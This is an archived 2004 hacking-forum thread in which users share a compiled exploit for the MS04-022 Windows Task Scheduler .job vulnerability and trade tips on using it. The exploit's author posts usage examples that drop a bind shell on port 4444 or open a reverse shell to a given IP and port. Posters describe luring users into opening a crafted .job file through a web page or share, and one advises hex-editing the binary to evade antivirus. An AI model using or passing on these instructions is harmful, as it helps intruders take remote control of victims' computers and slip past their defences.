studnikov
Jul 27 2004, 09:58 AM
It seems like alot of people had problems compiling this.
I didn't so i thought i would post it for the ones who did.
Thanks to ScriptGod for the code.
| CODE |
Compiling...
MS04-022ScriptGod.cpp
MS04-022ScriptGod.obj - 0 error(s), 0 warning(s)
Linking...
MS04-022ScriptGod.exe - 0 error(s), 0 warning(s)
|
z-man
Jul 27 2004, 10:00 AM
10q very much
but on what port that exploit work
445?
The Storm
Jul 27 2004, 10:11 AM
thank ya 2 downloads 2 reypls *g*
nuorder
Jul 27 2004, 11:10 AM
| QUOTE (z-man @ Jul 27 2004, 08:00 PM) |
10q very much
but on what port that exploit work 445? |
come on man be serious
its local unless you specify a port for the shell
ivan288
Jul 27 2004, 11:41 AM
usage: new <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP
> <Port> >
TargetID Name EIP
----------------------------------------------------------
0 Windows XP SP0+1 GER 0x76e21a21
1 DoS Windows XP ALL 0xffffffff
PayloadID Name
--------------------------
0 WinExec
1 BindShell
2 ReverseShell
any help onm how to use this. i mean what u put in for command for example.
ivan288
Jul 27 2004, 11:51 AM
i tried:
exploit.exe 0 1 k.bat 6666 127.0.0.1
its suppose to make a k.bat file with bindshell on port 6666.
what i does it creates k.bat in the same directory. Bu then it doesnt open the shell even when i click on the .bat.
not sure what i am doin wrong.
Coktailcrazy
Jul 27 2004, 12:02 PM
nice work to compile this!! gonna test it out!
thorel
Jul 27 2004, 12:12 PM
Nice job man, sweet
nuorder
Jul 27 2004, 12:25 PM
| QUOTE (ivan288 @ Jul 27 2004, 09:51 PM) |
i tried:
exploit.exe 0 1 k.bat 6666 127.0.0.1
its suppose to make a k.bat file with bindshell on port 6666.
what i does it creates k.bat in the same directory. Bu then it doesnt open the shell even when i click on the .bat.
not sure what i am doin wrong. |
instead of k.bat you should have k.job, it is sometimes a good idea to read the main article on a vulnerability before you try to use it
| QUOTE |
How could an attacker exploit this vulnerability?
There are many ways that a system could be vulnerable to this attack. Here are some examples:
.
An attacker could host a malicious Web site that is designed to exploit this vulnerability through Internet Explorer and then persuade a user to view the Web site.
.
An attacker could add a specially crafted .job file to the local file system or to a network share and then persuade the user to view the folder by using Windows Explorer.
.
An attacker could also access the affected component through another vector. For example, an attacker could log on to the system interactively or by using another program that passes parameters to the vulnerable component (locally or remotely).
|
from the microsoft site www.microsoft.com/technet/security/bulletin/MS04-022.mspx
DrDoc
Jul 27 2004, 03:02 PM
Thx 4 the compiled Version
i have tested it to compile it.. with the result im a noob
25 Downloads
and just a few replys.. very poor
BIG THX
Cya Doc
ScriptGod
Jul 27 2004, 03:37 PM
- first the TagetID (there are only german atm)
- second the ID of the payload yo wanna use
- the output file (must be .job)
- paramter of the payload
examples:
- winexec (runs notepad.exe)
job.exe 0 0 C:\test.job notepad.exe
- bindshell (target binds a shell on port 4444)
job.exe 0 1 C:\test.job 4444
- reverseshell (target connects to 192.168.0.1:666)
job.exe 0 2 C:\test.job 192.168.0.1 666
The Storm
Jul 27 2004, 04:15 PM
is this a local exploit? cause there isn't a remoteadress required ?!?
ScriptGod
Jul 27 2004, 04:29 PM
| QUOTE (The Storm @ Jul 27 2004, 04:15 PM) |
| is this a local exploit? cause there isn't a remoteadress required ?!? |
yes mainly local. because it requires user interacticty
=k3Rn=
Jul 27 2004, 05:25 PM
hm thats a pitty
The Storm
Jul 28 2004, 07:47 AM
hm when i use this exploit my explorer.exe crashes
is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!?
mortello
Jul 28 2004, 04:59 PM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
| hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
It can be used remotely, you just need users interactivity....so its a bit more likle a local exploit
another way of using it, is puting the .job into a explorer page.... (I believe that's how it goes too)
However, reading the advisory would explain a little more on what you can do with this advisory,....
ScriptGod
Jul 28 2004, 05:00 PM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
| hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
what language has your windows?
however remote is only possible with USER INTERACTIVITY.
newbie
Jul 28 2004, 05:07 PM
NAV2004 Detects it immediately.
):
Gotisch
Jul 28 2004, 08:33 PM
why
. you should be happy the antivir software houses are updating their filters that fast !
mortello
Jul 29 2004, 01:51 AM
| QUOTE (newbie @ Jul 28 2004, 05:07 PM) |
NAV2004 Detects it immediately.
): |
hex edit it and most AV won't pick it up
Thanks Scriptgod for the precision on the part where I was wrong about the webpage !
The Storm
Jul 30 2004, 10:14 PM
I have Widnows XP Professional German SP1
Serhat
Aug 2 2004, 07:25 AM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
| hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
This can only be because you are patched?
here it crashes also.. but then again I am using the Dutch version of Windows XP
Also compiled fine here.. if the exploit wasn't upped I would have done it.. but seems I am too late
Serhat
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
